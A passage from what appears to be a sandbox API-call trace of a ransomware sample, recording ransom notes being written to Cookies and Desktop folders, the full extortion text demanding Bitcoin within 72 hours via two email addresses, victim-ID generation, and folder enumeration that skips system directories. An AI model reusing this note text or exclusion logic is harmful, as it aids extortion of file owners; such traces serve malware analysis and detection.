	[0179.559] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.562] CloseHandle (hObject=0x380) returned 1
	[0179.562] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.563] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.564] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.565] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.565] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\cookies\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.565] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.566] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.566] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.566] CloseHandle (hObject=0x380) returned 1
	[0179.566] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.566] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.567] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.567] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0179.567] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\cookies\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.569] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.569] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.572] CloseHandle (hObject=0x380) returned 1
	[0179.572] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.572] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.572] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.573] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.574] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.574] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\cookies\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.574] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.574] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.574] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.575] CloseHandle (hObject=0x380) returned 1
	[0179.575] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*.*" (normalized: "c:\\users\\default\\cookies\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x848672b0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0179.575] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0179.575] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0179.575] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1
	[0179.575] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1
	[0179.575] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.576] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.576] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop"
	[0179.576] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop"
	[0179.576] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\"
	[0179.576] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Desktop\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\"
	[0179.576] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*"
	[0179.576] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*" (normalized: "c:\\users\\default\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.577] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\*.*") returned 28
	[0179.577] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.577] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Desktop\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\default\\desktop\\*.*") returned 0x1c
	[0179.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.577] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0179.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.577] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0179.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.578] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0179.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.578] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.578] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0179.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.579] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0179.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.580] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.580] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0179.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.580] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0179.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.580] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0179.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.581] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0179.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.581] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="cache") returned 0x0
	[0179.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.581] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.581] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="webcache") returned 0x0
	[0179.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.582] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="inetcache") returned 0x0
	[0179.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.582] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="nvidia") returned 0x0
	[0179.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.582] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="packages") returned 0x0
	[0179.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.583] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="cookies") returned 0x0
	[0179.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.583] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="programdata") returned 0x0
	[0179.583] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.583] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0179.583] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.583] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.584] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop"
	[0179.584] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Desktop\\*.*") returned="C:\\Users\\Default\\Desktop\\*.*"
	[0179.584] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.584] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.584] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0179.584] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.585] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.585] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.589] CloseHandle (hObject=0x380) returned 1
	[0179.589] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.589] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.598] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.598] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\desktop\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.598] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.599] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.599] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.599] CloseHandle (hObject=0x380) returned 1
	[0179.599] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.600] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.600] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.600] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0179.600] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.600] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.600] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.603] CloseHandle (hObject=0x380) returned 1
	[0179.604] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.604] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.604] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.605] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.606] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.606] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\desktop\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.606] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.606] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.606] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.606] CloseHandle (hObject=0x380) returned 1
	[0179.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Desktop\\*.*" (normalized: "c:\\users\\default\\desktop\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x8494e39b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.607] lstrlenW (lpString="C:\\Users\\Default\\Desktop\\*.*") returned 28
	[0179.607] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.607] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Desktop\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\default\\desktop\\*.*") returned 0x1c
	[0179.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.608] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="windows") returned 0x0
	[0179.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.608] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="boot") returned 0x0
	[0179.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.608] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="system volume information") returned 0x0
	[0179.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.608] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.609] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="temp") returned 0x0
	[0179.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.609] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="program files") returned 0x0
	[0179.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.609] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.610] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="appdata") returned 0x0
	[0179.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.611] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="application data") returned 0x0
	[0179.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.611] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="winnt") returned 0x0
	[0179.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.611] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="tmp") returned 0x0
	[0179.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.612] StrStrW (lpFirst="c:\\users\\default\\desktop\\*.*", lpSrch="cache") returned 0x0
